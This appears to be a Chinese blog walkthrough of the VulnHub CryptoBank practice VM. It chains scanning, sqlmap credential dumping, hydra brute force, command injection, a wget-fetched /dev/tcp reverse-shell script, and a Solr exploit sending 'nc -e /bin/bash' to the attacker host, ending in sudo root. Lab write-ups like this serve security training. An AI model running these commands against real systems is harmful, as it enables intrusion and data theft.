vulnhub之CryptoBank的实践
2023-1-29 19:13:33 Author: 云计算和网络安全技术实践(查看原文) 阅读量:20 收藏

今天实践的是vulnhub的CryptoBank镜像,

下载地址,https://download.vulnhub.com/cryptobank/CryptoBank.ova,

先是用workstation导入,做地址扫描没扫到地址,

于是又用virtualbox导入,重新做地址扫描,

sudo netdiscover -r 192.168.0.0/24,这回有地址了,187就是,

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,

有web服务,浏览器访问http://192.168.0.187,

获取到一些用户名信息,先存起来,vim users.txt,

william.d
julius.b
bill.w
john.d

点击登录发现需要用域名,本地添加一下,

192.168.0.187 cryptobank.local

猜测登录页面有sql注入漏洞,上sqlmap,

先用burp suite获取到访问信息,保存到req.txt,

暴破数据库,sqlmap -r req.txt --dbs --batch,

暴破数据表,sqlmap -r req.txt --dbs -D cryptobank --tables --batch,

暴破表项,sqlmap -r req.txt --dbs -D cryptobank -T accounts --dump --batch,

获取到一些密码信息,也存起来,vim pass.txt,

x8CRvHqgPp
8hPx2Zqn4b
zm2gBcaxd3
NqRF4W85yf
LnBHvEhmw3
6X7DnLF5pG
3mwZd896Me
3Nrc2FYJMe
wJWm4CgV26
gFG7pqE5cn
LxZjkK87nu
7HwAEChFP9

用域名对web服务做目录暴破,dirb http://cryptobank.local,

浏览器访问http://cryptobank.local/development,

用之前获取到的用户名和密码信息进行暴破,

hydra -L users.txt -P pass.txt cryptobank.local -f http-get /development,获取到匹配的用户名密码,julius.b/wJWm4CgV26,

继续做目录暴破,dirb http://cryptobank.local/development/ -u julius.b:wJWm4CgV26,

浏览器访问http://cryptobank.local/development/tools,

点击进入执行系统命令的页面,用id/wJWm4CgV26进行测试,

在kali攻击机上造个反弹shell脚本,

msfvenom -p cmd/unix/reverse_bash lhost=192.168.0.188 lport=4444 R,

echo "0<&150-;exec 150<>/dev/tcp/192.168.0.188/4444;sh <&150 >&150 2>&150" > shell.sh,

在kali攻击机上开个web下载服务,python2 -m SimpleHTTPServer,

用wget http://192.168.0.188:8000/shell.sh当用户名进行输入,

再用ls/wJWm4CgV26查一下,确认反弹shell脚本已上传,

在kali攻击机上用msf开个反弹shell监听,

msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lhost 192.168.0.188
set lport 4444
exploit

最后用bash shell.sh当用户名进行输入,反弹shell这就过来了,

转成后台运行再升级成meterpreter的shell,

sessions -u 1,sessions -i 2,

查看到本地端口服务,netstat -antp,172.17.0.1:8983,

做个端口转发,portfwd add -l 8983 -p 8983 -r 172.17.0.1,

浏览器访问发现是solr服务,

查找solr服务可被漏洞利用的信息,

searchsploit solr,searchsploit -m 47572,

把漏洞利用脚本上传到靶机,

cd /tmp,upload /home/kali/47572.py,

转成交互式shell,python3 -c 'import pty; pty.spawn("/bin/bash")',

执行脚本送出反弹shell,

python3 47572.py 172.17.0.1 8983 "nc -e /bin/bash 192.168.0.188 7654",

重新开个nc反弹shell监听,获取到新的反弹shell,

转成交互式shell,python -c 'import pty; pty.spawn("/bin/sh")',

sudo -l查看root权限,确认可以直接切到root,

sudo su root,使用默认密码solr,id确认没问题,


文章来源: http://mp.weixin.qq.com/s?__biz=MzA3MjM5MDc2Nw==&mid=2650747411&idx=1&sn=f9d46b37e9ef988309223f33b2b55a62&chksm=87149313b0631a05d2cd04f5a7a210ff4d75aa604d588d86c7c25d1ae30a137a6cddb4e5d4dd#rd
如有侵权请联系:admin#unsafe.sh